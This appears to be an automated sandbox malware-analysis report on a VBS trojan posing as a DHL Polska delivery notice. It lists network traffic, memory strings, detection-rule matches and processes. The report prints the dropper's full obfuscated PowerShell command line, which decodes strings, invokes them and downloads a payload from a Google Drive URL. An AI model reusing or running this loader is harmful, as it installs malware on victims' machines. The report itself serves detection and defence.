');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padleaare=Trosfllen 'Lu$A,Abint,ipasspeGni PkTeom,nq.iUnc,r.FoDNo
            No Snort rule has matched


            AV Detection

            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
            Source: unknown | HTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.4:49739 version: TLS 1.2

            Software Vulnerabilities

            Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /download?id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.usercontent.google.com Connection: Keep-Alive
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /download?id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.usercontent.google.com Connection: Keep-Alive
            Source: global traffic | DNS traffic detected: DNS query: drive.google.com
            Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
            Source: powershell.exe, 00000005.00000002.3019849567.000001D06F29C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros
            Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: wscript.exe, 00000000.00000003.1692594649.0000019747627000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ca6d2a1b68f47
            Source: wscript.exe, 00000000.00000003.1692245556.00000197493F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692872277.00000197493F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692717937.00000197493F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabZy
            Source: wscript.exe, 00000000.00000003.1692798831.000001974764E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692594649.0000019747627000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ca6d2a1b68
            Source: powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://drive.google.com
            Source: powershell.exe, 00000005.00000002.2970229076.000001D0588FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://drive.usercontent.google.com
            Source: powershell.exe, 00000005.00000002.3010170859.000001D066B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000009.00000002.2969690427.0000000004F26000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000005.00000002.2970229076.000001D056AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2969690427.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000009.00000002.2969690427.0000000004F26000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000005.00000002.2970229076.000001D056AE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000009.00000002.2969690427.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000005.00000002.2970229076.000001D056FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
            Source: powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.g
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.go
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.goo
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.goog
            Source: powershell.exe, 00000005.00000002.2970229076.000001D0588BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.googPB
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.googl
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.c
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.co
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D05856A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D056D05000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/u
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?e
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?ex
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?exp
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?expo
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?expor
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=d
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=do
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=dow
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=down
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downl
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downlo
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downloa
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&i
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-s
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-sr
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srW
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9W
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9Ws
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsT
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTx
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0a
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2N
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NV
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2a
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aU
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUm
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmn
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3V
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3Vq
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3Vqy
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D056D05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC
            Source: powershell.exe, 00000009.00000002.2969690427.0000000004F26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyCXR
Source: powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.googh8
Source: powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D056FA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D056FA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC&export=download
Source: powershell.exe, 00000009.00000002.2969690427.0000000004F26000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000005.00000002.3017587099.000001D06EF80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000005.00000002.3010170859.000001D066B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000005.00000002.2970229076.000001D056FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000005.00000002.2970229076.000001D056FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000005.00000002.2970229076.000001D056FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000005.00000002.2970229076.000001D056FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000005.00000002.2970229076.000001D056FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | HTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.4:49739 version: TLS 1.2

System Summary

Source: amsi32_6160.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8096, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6160, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 5002
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 5002
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 5002
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. 
IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padle
Source: C:\Windows\System32\wscript.exe | Process Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_04C0F1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_04C0FAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_04C0EEA8
Source: DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs | Initial sample: Strings found which are bigger than 50
Source: amsi32_6160.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8096, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6160, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal96.troj.expl.evad.winVBS@9/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Democratising.Spi
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wisucaoa.tgs.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8096
